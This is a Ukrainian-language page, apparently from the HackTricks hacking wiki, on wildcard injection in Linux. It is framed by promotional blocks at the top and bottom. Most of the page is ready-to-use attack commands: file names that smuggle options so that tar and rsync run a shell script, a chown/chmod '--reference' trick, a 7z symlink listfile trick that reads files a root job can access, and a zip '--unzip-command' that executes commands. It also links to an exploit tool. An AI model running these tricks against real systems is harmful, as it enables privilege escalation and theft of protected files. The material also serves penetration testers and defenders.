6.3 KiB
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити рекламу вашої компанії на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакінг-трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.
chown, chmod
Ви можете вказати, якого власника файлу та дозволи ви хочете скопіювати для решти файлів
touch "--reference=/my/own/path/filename"
Ви можете використати це за допомогою https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (комбінований атака)
Додаткова інформація в https://www.exploit-db.com/papers/33930
Tar
Виконання довільних команд:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Ви можете використати це за допомогою https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (атака tar)
Додаткова інформація в https://www.exploit-db.com/papers/33930
Rsync
Виконання довільних команд:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Ви можете використати це за допомогою https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (атака rsync)
Додаткова інформація за посиланням https://www.exploit-db.com/papers/33930
7z
У 7z навіть використовуючи --
перед *
(зауважте, що --
означає, що наступний ввід не може бути оброблений як параметри, тому в цьому випадку лише шляхи до файлів) ви можете спричинити довільну помилку для читання файлу, тому якщо команда, подібна до наступної, виконується користувачем root:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
І ви можете створювати файли в папці, де виконується цей код, ви можете створити файл @root.txt
та файл root.txt
, який є символічним посиланням на файл, який ви хочете прочитати:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Потім, коли 7z виконується, він буде розглядати root.txt
як файл, що містить список файлів, які він повинен стиснути (це показує наявність @root.txt
), і коли 7z читає root.txt
, він буде читати /file/you/want/to/read
, оскільки вміст цього файлу не є списком файлів, він викине помилку, показуючи вміст.
Додаткова інформація в Write-ups of the box CTF від HackTheBox.
Zip
Виконання довільних команд:
zip name.zip files -T --unzip-command "sh -c whoami"
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити свою компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF Перевірте ПЛАНИ ПІДТРИМКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.